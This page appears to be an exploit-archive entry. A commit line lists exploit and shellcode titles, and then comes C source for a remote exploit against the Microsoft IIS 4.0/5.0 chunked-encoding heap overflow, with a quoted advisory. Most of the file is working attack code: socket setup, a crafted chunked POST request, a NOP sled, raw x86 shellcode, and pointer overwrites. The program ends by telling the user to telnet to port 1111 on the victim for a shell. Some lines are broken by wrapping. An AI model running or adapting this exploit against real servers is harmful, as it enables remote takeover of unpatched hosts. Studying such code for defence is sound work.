880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
233 lines
No EOL
7.3 KiB
C
233 lines
No EOL
7.3 KiB
C
// source: https://www.securityfocus.com/bid/4485/info
|
|
|
|
A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services).
|
|
|
|
This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
|
|
|
|
Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
|
|
|
|
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
|
|
|
|
/*
|
|
Windows 2000 Server Exploit By CHINANSL Security Team.
|
|
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
|
|
Warning:THIS PROGRAM WILL ONLY TEST.
|
|
CHINANSL Technology CO.,LTD
|
|
http://www.chinansl.com
|
|
keji@chinansl.com
|
|
*/
|
|
|
|
#include "stdafx.h"
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <windows.h>
|
|
#pragma comment (lib,"Ws2_32")
|
|
|
|
int main(int argc, char* argv[])
|
|
{
|
|
if(argc != 4)
|
|
{
|
|
printf("%s ip port aspfilepath\n\n",argv
|
|
[0]);
|
|
printf(" ie. %s 127.0.0.1
|
|
80 /iisstart.asp\n",argv[0]);
|
|
puts(" programed by keji@chinansl.com");
|
|
|
|
return 0;
|
|
}
|
|
|
|
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
|
|
//address of SHELLCODE
|
|
DWORD
|
|
jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6
|
|
\x01";///"\x0c\xfb\xe6\x01";
|
|
|
|
char* destIP=argv[1];
|
|
char* destFile=argv[3];
|
|
int webport=atoi(argv[2]);
|
|
char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02
|
|
\x02" "PADP"; //16 bytes
|
|
|
|
WSADATA ws;
|
|
SOCKET s;
|
|
long result=0;
|
|
if(WSAStartup(0x0101,&ws) != 0)
|
|
{
|
|
puts("WSAStartup() error");
|
|
return -1;
|
|
}
|
|
|
|
struct sockaddr_in addr;
|
|
addr.sin_family=AF_INET;
|
|
addr.sin_port=htons(webport);
|
|
addr.sin_addr.s_addr=inet_addr(destIP);
|
|
s=socket(AF_INET,SOCK_STREAM,0);
|
|
if(s==-1)
|
|
{
|
|
puts("Socket create error");
|
|
return -1;
|
|
}
|
|
|
|
if(connect(s,(struct sockaddr *)&addr,sizeof(addr))
|
|
== -1)
|
|
{
|
|
puts("Cannot connect to the specified
|
|
host");
|
|
return -1;
|
|
}
|
|
|
|
char buff[4096];
|
|
char* shellcode=
|
|
|
|
"\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33
|
|
\xc9\x89"
|
|
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65
|
|
\x6c\x33\x32"
|
|
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32
|
|
\x2e\xab"
|
|
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32
|
|
\xc0\x4f"
|
|
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53
|
|
\xff\xd0\x89"
|
|
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53
|
|
\xff\xd0"
|
|
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75
|
|
\xfc\xff\xd3\x89"
|
|
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6
|
|
\x66\xbe"
|
|
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66
|
|
\xbe\x3e\x02\x56"
|
|
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56
|
|
\xff\x75\xfc"
|
|
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75
|
|
\xfc\xff\xd3\x89"
|
|
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75
|
|
\xfc\xff\xd3\x89"
|
|
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75
|
|
\xfc\xff\xd3\x89"
|
|
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45
|
|
\xe0\x6a"
|
|
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8
|
|
\xff\xd3"
|
|
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3
|
|
\x89\x45"
|
|
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13
|
|
\xff\x75\xf8"
|
|
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45
|
|
\xc8\x6a"
|
|
"\x03\xff\x75\xf8\xff\xd3\x89\x85
|
|
\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
|
|
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0
|
|
\xab\xf7\xd0"
|
|
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8
|
|
\xab\x33\xc0"
|
|
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50
|
|
\xff\x55"
|
|
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4
|
|
\x6a\x10"
|
|
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75
|
|
\xc4\xff"
|
|
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45
|
|
\xc0\x33"
|
|
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50
|
|
\xff\x55"
|
|
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45
|
|
\x94\x50"
|
|
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44
|
|
\x32\xc0"
|
|
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01
|
|
\x89\x47"
|
|
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89
|
|
\x47\x3c"
|
|
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85
|
|
\x38\xff"
|
|
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51
|
|
\x53\xff"
|
|
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34
|
|
\xff\xff\xff\x89"
|
|
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85
|
|
\x2c\xff\xff\xff\x50"
|
|
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85
|
|
\x2c\xff\xff\xff\x85"
|
|
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85
|
|
\x2c\xff\xff\xff\x50\x53"
|
|
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0
|
|
\x74\x6d"
|
|
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
|
|
\xff\xff\xff\xff"
|
|
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90
|
|
\x90\x90"
|
|
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90
|
|
\x33\xc0"
|
|
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0
|
|
\xff\x55\xc8"
|
|
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50
|
|
\x8d\x85"
|
|
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
|
|
\xff\xff"
|
|
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4
|
|
\xff\x75\xc4"
|
|
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95
|
|
\x1c\xff\xff\xff\x6a"
|
|
"\xff\xff\x95\x18\xff\xff\xff";
|
|
|
|
|
|
char* s1="POST ";// HTTP/1.1\r\n";
|
|
char* s2="Accept: */*\r\n";
|
|
char* s4="Content-Type: application/x-www-
|
|
form-urlencoded\r\n";
|
|
char* s5="Transfer-Encoding:
|
|
chunked\r\n\r\n";
|
|
char* sc="0\r\n\r\n\r\n";
|
|
|
|
char shellcodebuff[1024*8];
|
|
memset(shellcodebuff,0x90,sizeof
|
|
(shellcodebuff));
|
|
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
|
|
strlen(shellcode)-1],shellcode,strlen(shellcode));
|
|
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
|
|
|
|
|
|
char sendbuff[1024*16];
|
|
memset(sendbuff,0,1024*16);
|
|
|
|
sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %
|
|
s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%
|
|
s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j
|
|
mpaddr*/,sc);
|
|
|
|
|
|
int sendlen=strlen(sendbuff);
|
|
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
|
|
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;
|
|
|
|
result=send(s,sendbuff,sendlen,0);
|
|
if(result == -1 )
|
|
{
|
|
puts("Send shellcode error!");
|
|
return -1;
|
|
}
|
|
|
|
memset(buff,0,4096);
|
|
result=recv(s,buff,sizeof(buff),0);
|
|
|
|
if(strstr(buff,"<html>") != NULL)
|
|
{
|
|
shutdown(s,0);
|
|
closesocket(s);
|
|
|
|
puts("Send shellcode error!Try again!");
|
|
return -1;
|
|
}
|
|
|
|
|
|
shutdown(s,0);
|
|
closesocket(s);
|
|
printf("\nUse <telnet %s 1111> to connect to the
|
|
host\n",destIP);
|
|
puts("If you cannot connect to the host,try run
|
|
this program again!");
|
|
|
|
return 0;
|
|
} |